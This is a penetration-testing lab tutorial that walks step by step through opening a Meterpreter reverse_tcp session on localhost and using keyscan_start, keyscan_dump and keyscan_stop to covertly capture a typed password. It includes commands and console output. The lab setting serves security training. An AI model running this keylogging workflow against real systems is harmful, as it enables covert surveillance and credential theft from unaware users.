Introduction
In this lab, you will explore a common post-exploitation technique: keystroke logging. Keystroke logging, or "keylogging," is the process of recording the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored. In penetration testing, this technique is invaluable for gathering sensitive information such as usernames, passwords, and other confidential data.
We will use Metasploit Framework's powerful payload, Meterpreter, to accomplish this. Meterpreter has a built-in module called keyscan that allows an attacker to easily start, dump, and stop a keylogger on a compromised system. Throughout this lab, you will learn how to gain a Meterpreter session, deploy the keylogger, capture keystrokes, and then clean up your tracks.
Gain a Meterpreter session on a target
In this step, we will set up a listener in Metasploit and execute a payload to gain a Meterpreter session. For the purpose of this lab, we will act as both the attacker and the target on the same machine. A payload file named payload.elf has already been created for you in the ~/project directory.
First, let's start the Metasploit Framework console.
msfconsole -q
Once msfconsole is loaded, we need to set up a handler to listen for the incoming connection from our payload.
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
Now, run the listener as a background job using the -j flag.
exploit -j
You should see that the handler has started.
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 127.0.0.1:4444
Now, open a new terminal tab by clicking the + icon in the terminal panel. In this new tab, execute the payload.
./payload.elf
Switch back to your first terminal tab with msfconsole. You should see a message indicating that a Meterpreter session has been opened.
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:38908) at 2023-10-27 10:30:00 -0400
To interact with this new session, use the sessions command.
sessions -i 1
Your prompt should change to meterpreter>, indicating you are now in control of the target session.
[*] Starting interaction with 1...
meterpreter >
Start the keystroke logger with the keyscan_start command
In this step, with an active Meterpreter session, we will start the keystroke logger on the target machine. The command for this is keyscan_start. This command injects a keylogger into a process on the target system and begins capturing all keyboard input.
Ensure you are at the meterpreter> prompt. Type the following command and press Enter:
keyscan_start
The system will confirm that the keylogger has been initiated.
Starting the keystroke sniffer...
The logger is now running silently in the background on the target system, recording every key that is pressed.
Wait for the user to type information
In this step, we will simulate a user typing sensitive information on the target machine. Since our keylogger is active, it will capture this activity.
Open a new terminal tab again by clicking the + icon. In this new terminal, we will simulate a user typing a password. You can type any command, but for this example, we'll use echo to simulate typing a secret password.
echo "MySuperSecretPassword123"
After running the command, you can close this new terminal tab. The keystrokes for echo "MySuperSecretPassword123" have now been captured by our running keylogger. Return to the terminal tab where your Meterpreter session is active.
Dump the captured keystrokes with the keyscan_dump command
In this step, we will retrieve the keystrokes that have been captured by the logger. The keyscan_dump command fetches all the recorded keystrokes from the target machine and displays them in your Meterpreter console.
At the meterpreter> prompt, execute the following command:
keyscan_dump
You will see the output of all the keystrokes captured since the logger was started. This will include the command you typed in the previous step.
Dumping captured keystrokes...
echo "MySuperSecretPassword123"
As you can see, the command we typed in the other terminal has been successfully captured. This demonstrates how an attacker can steal credentials, commands, and other sensitive text typed by a user.
Stop the keystroke logger with keyscan_stop
In this step, we will stop the keylogger. It is crucial for a penetration tester to clean up after an engagement to remove any artifacts and stop any running processes, leaving the target system as it was found.
To stop the keylogger, use the keyscan_stop command in your Meterpreter session.
keyscan_stop
The system will confirm that the keylogger has been stopped.
Stopping the keystroke sniffer...
The keylogger is no longer active on the target machine. You can now safely exit the Meterpreter session and msfconsole by typing exit twice.
Summary
In this lab, you have successfully learned how to perform keystroke logging on a target system using Meterpreter. You practiced the entire lifecycle of this post-exploitation technique, from gaining a session to cleaning up your tools.
You learned how to:
- Establish a Meterpreter session using a handler and a payload.
- Start the keylogger on a target using the
keyscan_startcommand. - Dump the captured keystrokes to view sensitive information with
keyscan_dump. - Stop the keylogger and clean up the session using
keyscan_stop.
This is a powerful technique that highlights the importance of system security and monitoring. Remember to use these skills responsibly and ethically. Congratulations on completing the lab!


